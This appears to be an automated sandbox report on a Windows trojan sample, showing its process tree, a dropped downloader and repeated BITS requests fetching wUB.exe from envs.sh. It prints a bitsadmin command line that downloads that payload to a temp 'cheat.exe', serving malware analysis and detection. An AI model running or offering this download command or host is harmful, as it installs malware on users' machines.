                                            Timestamp | Bytes transferred | Direction | Data
                                            2024-09-16 10:23:17 UTC | 212 | OUT | GET /wUB.exe HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept: */*
                                            Accept-Encoding: identity
                                            If-Unmodified-Since: Sun, 15 Sep 2024 18:01:56 GMT
                                            Range: bytes=5475-5557
                                            User-Agent: Microsoft BITS/7.8
                                            Host: envs.sh
                                            2024-09-16 10:23:17 UTC | 421 | IN | HTTP/1.1 206 Partial Content
                                            Server: nginx/1.18.0
                                            Date: Mon, 16 Sep 2024 10:23:17 GMT
                                            Content-Type: application/x-msdownload
                                            Content-Length: 83
                                            Connection: close
                                            Last-Modified: Sun, 15 Sep 2024 18:01:56 GMT
                                            ETag: "66e72114-13a00"
                                            Strict-Transport-Security: max-age=63072000; preload
                                            X-Content-Type-Options: nosniff
                                            X-XSS-Protection: 1; mode=block
                                            X-Frame-Options: DENY
                                            Content-Range: bytes 5475-5557/80384


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            23 | 192.168.2.4 | 49771 | 89.163.145.170 | 443 | 2708 | C:\Windows\System32\svchost.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            2024-09-16 10:23:20 UTC | 212 | OUT | GET /wUB.exe HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept: */*
                                            Accept-Encoding: identity
                                            If-Unmodified-Since: Sun, 15 Sep 2024 18:01:56 GMT
                                            Range: bytes=5558-5714
                                            User-Agent: Microsoft BITS/7.8
                                            Host: envs.sh
                                            2024-09-16 10:23:20 UTC | 422 | IN | HTTP/1.1 206 Partial Content
                                            Server: nginx/1.18.0
                                            Date: Mon, 16 Sep 2024 10:23:20 GMT
                                            Content-Type: application/x-msdownload
                                            Content-Length: 157
                                            Connection: close
                                            Last-Modified: Sun, 15 Sep 2024 18:01:56 GMT
                                            ETag: "66e72114-13a00"
                                            Strict-Transport-Security: max-age=63072000; preload
                                            X-Content-Type-Options: nosniff
                                            X-XSS-Protection: 1; mode=block
                                            X-Frame-Options: DENY
                                            Content-Range: bytes 5558-5714/80384


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            24 | 192.168.2.4 | 49772 | 89.163.145.170 | 443 | 2708 | C:\Windows\System32\svchost.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            2024-09-16 10:23:23 UTC | 212 | OUT | GET /wUB.exe HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept: */*
                                            Accept-Encoding: identity
                                            If-Unmodified-Since: Sun, 15 Sep 2024 18:01:56 GMT
                                            Range: bytes=5715-5997
                                            User-Agent: Microsoft BITS/7.8
                                            Host: envs.sh
                                            2024-09-16 10:23:23 UTC | 422 | IN | HTTP/1.1 206 Partial Content
                                            Server: nginx/1.18.0
                                            Date: Mon, 16 Sep 2024 10:23:23 GMT
                                            Content-Type: application/x-msdownload
                                            Content-Length: 283
                                            Connection: close
                                            Last-Modified: Sun, 15 Sep 2024 18:01:56 GMT
                                            ETag: "66e72114-13a00"
                                            Strict-Transport-Security: max-age=63072000; preload
                                            X-Content-Type-Options: nosniff
                                            X-XSS-Protection: 1; mode=block
                                            X-Frame-Options: DENY
                                            Content-Range: bytes 5715-5997/80384


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            25 | 192.168.2.4 | 49773 | 89.163.145.170 | 443 | 2708 | C:\Windows\System32\svchost.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            2024-09-16 10:23:26 UTC | 212 | OUT | GET /wUB.exe HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept: */*
                                            Accept-Encoding: identity
                                            If-Unmodified-Since: Sun, 15 Sep 2024 18:01:56 GMT
                                            Range: bytes=5998-6078
                                            User-Agent: Microsoft BITS/7.8
                                            Host: envs.sh
                                            2024-09-16 10:23:26 UTC | 421 | IN | HTTP/1.1 206 Partial Content
                                            Server: nginx/1.18.0
                                            Date: Mon, 16 Sep 2024 10:23:26 GMT
                                            Content-Type: application/x-msdownload
                                            Content-Length: 81
                                            Connection: close
                                            Last-Modified: Sun, 15 Sep 2024 18:01:56 GMT
                                            ETag: "66e72114-13a00"
                                            Strict-Transport-Security: max-age=63072000; preload
                                            X-Content-Type-Options: nosniff
                                            X-XSS-Protection: 1; mode=block
                                            X-Frame-Options: DENY
                                            Content-Range: bytes 5998-6078/80384
                                            2024-09-16 10:23:26 UTC | 81 | IN


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            26 | 192.168.2.4 | 49774 | 89.163.145.170 | 443 | 2708 | C:\Windows\System32\svchost.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            2024-09-16 10:23:29 UTC | 212 | OUT | GET /wUB.exe HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept: */*
                                            Accept-Encoding: identity
                                            If-Unmodified-Since: Sun, 15 Sep 2024 18:01:56 GMT
                                            Range: bytes=6079-6087
                                            User-Agent: Microsoft BITS/7.8
                                            Host: envs.sh
                                            2024-09-16 10:23:29 UTC | 420 | IN | HTTP/1.1 206 Partial Content
                                            Server: nginx/1.18.0
                                            Date: Mon, 16 Sep 2024 10:23:29 GMT
                                            Content-Type: application/x-msdownload
                                            Content-Length: 9
                                            Connection: close
                                            Last-Modified: Sun, 15 Sep 2024 18:01:56 GMT
                                            ETag: "66e72114-13a00"
                                            Strict-Transport-Security: max-age=63072000; preload
                                            X-Content-Type-Options: nosniff
                                            X-XSS-Protection: 1; mode=block
                                            X-Frame-Options: DENY
                                            Content-Range: bytes 6079-6087/80384
                                            2024-09-16 10:23:29 UTC | 9 | IN


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            27 | 192.168.2.4 | 49775 | 89.163.145.170 | 443 | 2708 | C:\Windows\System32\svchost.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            2024-09-16 10:23:33 UTC | 212 | OUT | GET /wUB.exe HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept: */*
                                            Accept-Encoding: identity
                                            If-Unmodified-Since: Sun, 15 Sep 2024 18:01:56 GMT
                                            Range: bytes=6088-6168
                                            User-Agent: Microsoft BITS/7.8
                                            Host: envs.sh
                                            2024-09-16 10:23:33 UTC | 421 | IN | HTTP/1.1 206 Partial Content
                                            Server: nginx/1.18.0
                                            Date: Mon, 16 Sep 2024 10:23:33 GMT
                                            Content-Type: application/x-msdownload
                                            Content-Length: 81
                                            Connection: close
                                            Last-Modified: Sun, 15 Sep 2024 18:01:56 GMT
                                            ETag: "66e72114-13a00"
                                            Strict-Transport-Security: max-age=63072000; preload
                                            X-Content-Type-Options: nosniff
                                            X-XSS-Protection: 1; mode=block
                                            X-Frame-Options: DENY
                                            Content-Range: bytes 6088-6168/80384
                                            2024-09-16 10:23:33 UTC | 81 | IN


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            28 | 192.168.2.4 | 49776 | 89.163.145.170 | 443 | 2708 | C:\Windows\System32\svchost.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            2024-09-16 10:23:37 UTC | 212 | OUT | GET /wUB.exe HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept: */*
                                            Accept-Encoding: identity
                                            If-Unmodified-Since: Sun, 15 Sep 2024 18:01:56 GMT
                                            Range: bytes=6169-6250
                                            User-Agent: Microsoft BITS/7.8
                                            Host: envs.sh
                                            2024-09-16 10:23:37 UTC | 421 | IN | HTTP/1.1 206 Partial Content
                                            Server: nginx/1.18.0
                                            Date: Mon, 16 Sep 2024 10:23:37 GMT
                                            Content-Type: application/x-msdownload
                                            Content-Length: 82
                                            Connection: close
                                            Last-Modified: Sun, 15 Sep 2024 18:01:56 GMT
                                            ETag: "66e72114-13a00"
                                            Strict-Transport-Security: max-age=63072000; preload
                                            X-Content-Type-Options: nosniff
                                            X-XSS-Protection: 1; mode=block
                                            X-Frame-Options: DENY
                                            Content-Range: bytes 6169-6250/80384
                                            2024-09-16 10:23:37 UTC | 82 | IN


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            29 | 192.168.2.4 | 49777 | 89.163.145.170 | 443 | 2708 | C:\Windows\System32\svchost.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            2024-09-16 10:23:42 UTC | 212 | OUT | GET /wUB.exe HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept: */*
                                            Accept-Encoding: identity
                                            If-Unmodified-Since: Sun, 15 Sep 2024 18:01:56 GMT
                                            Range: bytes=6251-6394
                                            User-Agent: Microsoft BITS/7.8
                                            Host: envs.sh
                                            2024-09-16 10:23:42 UTC | 422 | IN | HTTP/1.1 206 Partial Content
                                            Server: nginx/1.18.0
                                            Date: Mon, 16 Sep 2024 10:23:42 GMT
                                            Content-Type: application/x-msdownload
                                            Content-Length: 144
                                            Connection: close
                                            Last-Modified: Sun, 15 Sep 2024 18:01:56 GMT
                                            ETag: "66e72114-13a00"
                                            Strict-Transport-Security: max-age=63072000; preload
                                            X-Content-Type-Options: nosniff
                                            X-XSS-Protection: 1; mode=block
                                            X-Frame-Options: DENY
                                            Content-Range: bytes 6251-6394/80384
                                            2024-09-16 10:23:42 UTC | 144 | IN


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            30 | 192.168.2.4 | 49778 | 89.163.145.170 | 443 | 2708 | C:\Windows\System32\svchost.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            2024-09-16 10:23:46 UTC | 212 | OUT | GET /wUB.exe HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept: */*
                                            Accept-Encoding: identity
                                            If-Unmodified-Since: Sun, 15 Sep 2024 18:01:56 GMT
                                            Range: bytes=6395-6623
                                            User-Agent: Microsoft BITS/7.8
                                            Host: envs.sh
                                            2024-09-16 10:23:46 UTC | 422 | IN | HTTP/1.1 206 Partial Content
                                            Server: nginx/1.18.0
                                            Date: Mon, 16 Sep 2024 10:23:46 GMT
                                            Content-Type: application/x-msdownload
                                            Content-Length: 229
                                            Connection: close
                                            Last-Modified: Sun, 15 Sep 2024 18:01:56 GMT
                                            ETag: "66e72114-13a00"
                                            Strict-Transport-Security: max-age=63072000; preload
                                            X-Content-Type-Options: nosniff
                                            X-XSS-Protection: 1; mode=block
                                            X-Frame-Options: DENY
                                            Content-Range: bytes 6395-6623/80384
                                            2024-09-16 10:23:46 UTC | 229 | IN


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            31 | 192.168.2.4 | 49779 | 89.163.145.170 | 443 | 2708 | C:\Windows\System32\svchost.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            2024-09-16 10:23:50 UTC | 212 | OUT | GET /wUB.exe HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept: */*
                                            Accept-Encoding: identity
                                            If-Unmodified-Since: Sun, 15 Sep 2024 18:01:56 GMT
                                            Range: bytes=6624-6716
                                            User-Agent: Microsoft BITS/7.8
                                            Host: envs.sh
                                            2024-09-16 10:23:50 UTC | 421 | IN | HTTP/1.1 206 Partial Content
                                            Server: nginx/1.18.0
                                            Date: Mon, 16 Sep 2024 10:23:50 GMT
                                            Content-Type: application/x-msdownload
                                            Content-Length: 93
                                            Connection: close
                                            Last-Modified: Sun, 15 Sep 2024 18:01:56 GMT
                                            ETag: "66e72114-13a00"
                                            Strict-Transport-Security: max-age=63072000; preload
                                            X-Content-Type-Options: nosniff
                                            X-XSS-Protection: 1; mode=block
                                            X-Frame-Options: DENY
                                            Content-Range: bytes 6624-6716/80384
                                            2024-09-16 10:23:50 UTC | 93 | IN


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            32 | 192.168.2.4 | 49780 | 89.163.145.170 | 443 | 2708 | C:\Windows\System32\svchost.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            2024-09-16 10:23:54 UTC | 212 | OUT | GET /wUB.exe HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept: */*
                                            Accept-Encoding: identity
                                            If-Unmodified-Since: Sun, 15 Sep 2024 18:01:56 GMT
                                            Range: bytes=6717-6852
                                            User-Agent: Microsoft BITS/7.8
                                            Host: envs.sh
                                            2024-09-16 10:23:54 UTC | 422 | IN | HTTP/1.1 206 Partial Content
                                            Server: nginx/1.18.0
                                            Date: Mon, 16 Sep 2024 10:23:54 GMT
                                            Content-Type: application/x-msdownload
                                            Content-Length: 136
                                            Connection: close
                                            Last-Modified: Sun, 15 Sep 2024 18:01:56 GMT
                                            ETag: "66e72114-13a00"
                                            Strict-Transport-Security: max-age=63072000; preload
                                            X-Content-Type-Options: nosniff
                                            X-XSS-Protection: 1; mode=block
                                            X-Frame-Options: DENY
                                            Content-Range: bytes 6717-6852/80384
                                            2024-09-16 10:23:54 UTC | 136 | IN


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            33 | 192.168.2.4 | 49781 | 89.163.145.170 | 443 | 2708 | C:\Windows\System32\svchost.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            2024-09-16 10:23:57 UTC | 212 | OUT | GET /wUB.exe HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept: */*
                                            Accept-Encoding: identity
                                            If-Unmodified-Since: Sun, 15 Sep 2024 18:01:56 GMT
                                            Range: bytes=6853-6880
                                            User-Agent: Microsoft BITS/7.8
                                            Host: envs.sh
                                            2024-09-16 10:23:58 UTC | 421 | IN | HTTP/1.1 206 Partial Content
                                            Server: nginx/1.18.0
                                            Date: Mon, 16 Sep 2024 10:23:57 GMT
                                            Content-Type: application/x-msdownload
                                            Content-Length: 28
                                            Connection: close
                                            Last-Modified: Sun, 15 Sep 2024 18:01:56 GMT
                                            ETag: "66e72114-13a00"
                                            Strict-Transport-Security: max-age=63072000; preload
                                            X-Content-Type-Options: nosniff
                                            X-XSS-Protection: 1; mode=block
                                            X-Frame-Options: DENY
                                            Content-Range: bytes 6853-6880/80384
                                            2024-09-16 10:23:58 UTC | 28 | IN


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            34 | 192.168.2.4 | 49782 | 89.163.145.170 | 443 | 2708 | C:\Windows\System32\svchost.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            2024-09-16 10:24:01 UTC | 212 | OUT | GET /wUB.exe HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept: */*
                                            Accept-Encoding: identity
                                            If-Unmodified-Since: Sun, 15 Sep 2024 18:01:56 GMT
                                            Range: bytes=6881-7029
                                            User-Agent: Microsoft BITS/7.8
                                            Host: envs.sh
                                            2024-09-16 10:24:02 UTC | 422 | IN | HTTP/1.1 206 Partial Content
                                            Server: nginx/1.18.0
                                            Date: Mon, 16 Sep 2024 10:24:01 GMT
                                            Content-Type: application/x-msdownload
                                            Content-Length: 149
                                            Connection: close
                                            Last-Modified: Sun, 15 Sep 2024 18:01:56 GMT
                                            ETag: "66e72114-13a00"
                                            Strict-Transport-Security: max-age=63072000; preload
                                            X-Content-Type-Options: nosniff
                                            X-XSS-Protection: 1; mode=block
                                            X-Frame-Options: DENY
                                            Content-Range: bytes 6881-7029/80384
                                            2024-09-16 10:24:02 UTC | 149 | IN


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            35 | 192.168.2.4 | 49783 | 89.163.145.170 | 443 | 2708 | C:\Windows\System32\svchost.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            2024-09-16 10:24:06 UTC | 212 | OUT | GET /wUB.exe HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept: */*
                                            Accept-Encoding: identity
                                            If-Unmodified-Since: Sun, 15 Sep 2024 18:01:56 GMT
                                            Range: bytes=7030-7122
                                            User-Agent: Microsoft BITS/7.8
                                            Host: envs.sh
                                            2024-09-16 10:24:06 UTC | 421 | IN | HTTP/1.1 206 Partial Content
                                            Server: nginx/1.18.0
                                            Date: Mon, 16 Sep 2024 10:24:06 GMT
                                            Content-Type: application/x-msdownload
                                            Content-Length: 93
                                            Connection: close
                                            Last-Modified: Sun, 15 Sep 2024 18:01:56 GMT
                                            ETag: "66e72114-13a00"
                                            Strict-Transport-Security: max-age=63072000; preload
                                            X-Content-Type-Options: nosniff
                                            X-XSS-Protection: 1; mode=block
                                            X-Frame-Options: DENY
                                            Content-Range: bytes 7030-7122/80384
                                            2024-09-16 10:24:06 UTC | 93 | IN


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            36 | 192.168.2.4 | 49784 | 89.163.145.170 | 443 | 2708 | C:\Windows\System32\svchost.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            2024-09-16 10:24:10 UTC | 212 | OUT | GET /wUB.exe HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept: */*
                                            Accept-Encoding: identity
                                            If-Unmodified-Since: Sun, 15 Sep 2024 18:01:56 GMT
                                            Range: bytes=7123-7371
                                            User-Agent: Microsoft BITS/7.8
                                            Host: envs.sh
                                            2024-09-16 10:24:10 UTC | 422 | IN | HTTP/1.1 206 Partial Content
                                            Server: nginx/1.18.0
                                            Date: Mon, 16 Sep 2024 10:24:10 GMT
                                            Content-Type: application/x-msdownload
                                            Content-Length: 249
                                            Connection: close
                                            Last-Modified: Sun, 15 Sep 2024 18:01:56 GMT
                                            ETag: "66e72114-13a00"
                                            Strict-Transport-Security: max-age=63072000; preload
                                            X-Content-Type-Options: nosniff
                                            X-XSS-Protection: 1; mode=block
                                            X-Frame-Options: DENY
                                            Content-Range: bytes 7123-7371/80384
                                            2024-09-16 10:24:10 UTC | 249 | IN


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            37 | 192.168.2.4 | 49785 | 89.163.145.170 | 443 | 2708 | C:\Windows\System32\svchost.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            2024-09-16 10:24:14 UTC | 212 | OUT | GET /wUB.exe HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept: */*
                                            Accept-Encoding: identity
                                            If-Unmodified-Since: Sun, 15 Sep 2024 18:01:56 GMT
                                            Range: bytes=7372-7600
                                            User-Agent: Microsoft BITS/7.8
                                            Host: envs.sh
                                            2024-09-16 10:24:14 UTC | 422 | IN | HTTP/1.1 206 Partial Content
                                            Server: nginx/1.18.0
                                            Date: Mon, 16 Sep 2024 10:24:14 GMT
                                            Content-Type: application/x-msdownload
                                            Content-Length: 229
                                            Connection: close
                                            Last-Modified: Sun, 15 Sep 2024 18:01:56 GMT
                                            ETag: "66e72114-13a00"
                                            Strict-Transport-Security: max-age=63072000; preload
                                            X-Content-Type-Options: nosniff
                                            X-XSS-Protection: 1; mode=block
                                            X-Frame-Options: DENY
                                            Content-Range: bytes 7372-7600/80384
                                            2024-09-16 10:24:14 UTC | 229 | IN


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            38 | 192.168.2.4 | 49786 | 89.163.145.170 | 443 | 2708 | C:\Windows\System32\svchost.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            2024-09-16 10:24:19 UTC | 212 | OUT | GET /wUB.exe HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept: */*
                                            Accept-Encoding: identity
                                            If-Unmodified-Since: Sun, 15 Sep 2024 18:01:56 GMT
                                            Range: bytes=7601-7780
                                            User-Agent: Microsoft BITS/7.8
                                            Host: envs.sh
                                            2024-09-16 10:24:19 UTC | 422 | IN | HTTP/1.1 206 Partial Content
                                            Server: nginx/1.18.0
                                            Date: Mon, 16 Sep 2024 10:24:19 GMT
                                            Content-Type: application/x-msdownload
                                            Content-Length: 180
                                            Connection: close
                                            Last-Modified: Sun, 15 Sep 2024 18:01:56 GMT
                                            ETag: "66e72114-13a00"
                                            Strict-Transport-Security: max-age=63072000; preload
                                            X-Content-Type-Options: nosniff
                                            X-XSS-Protection: 1; mode=block
                                            X-Frame-Options: DENY
                                            Content-Range: bytes 7601-7780/80384


                                            Session ID: 39, Source IP: 192.168.2.4, Source Port: 49787, Destination IP: 89.163.145.170, Destination Port: 443, PID: 2708, Process: C:\Windows\System32\svchost.exe
                                            Timestamp: 2024-09-16 10:24:23 UTC, Bytes transferred: 212, Direction: OUT, Data:
                                            GET /wUB.exe HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept: */*
                                            Accept-Encoding: identity
                                            If-Unmodified-Since: Sun, 15 Sep 2024 18:01:56 GMT
                                            Range: bytes=7781-7860
                                            User-Agent: Microsoft BITS/7.8
                                            Host: envs.sh
                                            Timestamp: 2024-09-16 10:24:23 UTC, Bytes transferred: 421, Direction: IN, Data:
                                            HTTP/1.1 206 Partial Content
                                            Server: nginx/1.18.0
                                            Date: Mon, 16 Sep 2024 10:24:23 GMT
                                            Content-Type: application/x-msdownload
                                            Content-Length: 80
                                            Connection: close
                                            Last-Modified: Sun, 15 Sep 2024 18:01:56 GMT
                                            ETag: "66e72114-13a00"
                                            Strict-Transport-Security: max-age=63072000; preload
                                            X-Content-Type-Options: nosniff
                                            X-XSS-Protection: 1; mode=block
                                            X-Frame-Options: DENY
                                            Content-Range: bytes 7781-7860/80384


                                            Target ID:0
                                            Start time:06:22:19
                                            Start date:16/09/2024
                                            Path:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exe
                                            Wow64 process (32bit):false
                                            Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exe"
                                            Imagebase:0xb90000
                                            File size:1'010'176 bytes
                                            MD5 hash:7AFABB528CE69E3A40DEC6C3253EF854
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:low
                                            Has exited:true

                                            Target ID:1
                                            Start time:06:22:20
                                            Start date:16/09/2024
                                            Path:C:\Windows\SysWOW64\mshta.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Windows\SysWOW64\mshta.exe" "C:\Users\user\AppData\Roaming\Downloader.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
                                            Imagebase:0x850000
                                            File size:13'312 bytes
                                            MD5 hash:06B02D5C097C7DB1F109749C45F3F505
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:moderate
                                            Has exited:false

                                            Target ID:2
                                            Start time:06:22:20
                                            Start date:16/09/2024
                                            Path:C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe
                                            Wow64 process (32bit):false
                                            Commandline:"C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe"
                                            Imagebase:0x226e67e0000
                                            File size:995'840 bytes
                                            MD5 hash:90FD25CED85FE6DB28D21AE7D1F02E2C
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe, Author: Joe Security
                                            Antivirus matches:
                                            • Detection: 100%, Avira
                                            • Detection: 75%, ReversingLabs
                                            Reputation:low
                                            Has exited:true

                                            Target ID:3
                                            Start time:06:22:20
                                            Start date:16/09/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff7699e0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:4
                                            Start time:06:22:21
                                            Start date:16/09/2024
                                            Path:C:\Windows\SysWOW64\bitsadmin.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Windows\System32\bitsadmin.exe" /transfer 8 https://envs.sh/wUB.exe C:\Users\user\AppData\Local\Temp\cheat.exe
                                            Imagebase:0x910000
                                            File size:186'880 bytes
                                            MD5 hash:F57A03FA0E654B393BB078D1C60695F3
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:moderate
                                            Has exited:false

                                            Target ID:5
                                            Start time:06:22:21
                                            Start date:16/09/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff7699e0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:false

                                            Target ID:6
                                            Start time:06:22:22
                                            Start date:16/09/2024
                                            Path:C:\Windows\System32\svchost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                            Imagebase:0x7ff6eef20000
                                            File size:55'320 bytes
                                            MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:false

                                            Target ID:12
                                            Start time:06:22:31
                                            Start date:16/09/2024
                                            Path:C:\Windows\System32\WerFault.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\WerFault.exe -u -p 6516 -s 2184
                                            Imagebase:0x7ff6cdd30000
                                            File size:570'736 bytes
                                            MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                              • API String ID: 0-1099412801
                                              • Opcode ID: 480490704706ac2331295bdf1fe74e281a2c6ee6ca0c0c1ba128e201fbbe98e8
                                              • Instruction ID: be0395aec917076e66b7fcfba78bfd8d66dac670e3b3abab1ae6ba4ec08f2241
                                              • Opcode Fuzzy Hash: 480490704706ac2331295bdf1fe74e281a2c6ee6ca0c0c1ba128e201fbbe98e8
                                              • Instruction Fuzzy Hash: 99C13230B1DB4A4FE769DB188860935B7E1FF99304B1546BED08AC71B6DE35F9028781
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: W$c
                                              • API String ID: 0-3017879651
                                              • Opcode ID: e017970e525dd3b8c8c3b7b52d0aed266e7b8e963a0bae45e05aff90d3fd9763
                                              • Instruction ID: 4c3255033a69296d091d3e51bd47a44b0fe7bf84b65fd2157ef22b30d0574d9b
                                              • Opcode Fuzzy Hash: e017970e525dd3b8c8c3b7b52d0aed266e7b8e963a0bae45e05aff90d3fd9763
                                              • Instruction Fuzzy Hash: 6E323931B0E78E5FE774DB6888616B577E1EF49310F0603BAD48DC72B2DA286D468781
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: uK_H$zK_H
                                              • API String ID: 0-393510644
                                              • Opcode ID: 38a3c63c553de361865092b06abb3aba8db6e3e37d9e1dcca9de892c21208fe7
                                              • Instruction ID: 7fb9b99e36de7cd24755a01b7213bdb783cab3588d24281f55cd607f020b9075
                                              • Opcode Fuzzy Hash: 38a3c63c553de361865092b06abb3aba8db6e3e37d9e1dcca9de892c21208fe7
                                              • Instruction Fuzzy Hash: 9112C471B09A4D4FDBA4EB6C8465AB937D2EF99300F4501B9D09DC72F6DD24AC42C340
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: PK_^$QK_^
                                              • API String ID: 0-2306524656
                                              • Opcode ID: 64c0f0e13ef73a7670d5b9b234244eb0d6b4006a9754e85b2ae13b48819ed729
                                              • Instruction ID: 0a0ede5540fa05bac515737dcfbbd102374e649d5d045fffebd89578cfcb748b
                                              • Opcode Fuzzy Hash: 64c0f0e13ef73a7670d5b9b234244eb0d6b4006a9754e85b2ae13b48819ed729
                                              • Instruction Fuzzy Hash: 67C15A27B0D6560AE314B7BCB8B58EA7760EF8133E75943B7D1DD8D0E7DC0866468290
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: d$3<L_^
                                              • API String ID: 0-1510923135
                                              • Opcode ID: 51bd6d715c331e2e44758050399ca80529dc8df99a9353edb7d5dea31e4121b2
                                              • Instruction ID: f6b5eddb92fc807cc7408a22fa39209599ce45d435ef63987d631d718a478e81
                                              • Opcode Fuzzy Hash: 51bd6d715c331e2e44758050399ca80529dc8df99a9353edb7d5dea31e4121b2
                                              • Instruction Fuzzy Hash: ABC11330B0DB4A4FE769DB588461575B7E1FFA9300B1607BED0CAC71B6DA29F9028741
                                              Strings
                                              Memory Dump Source
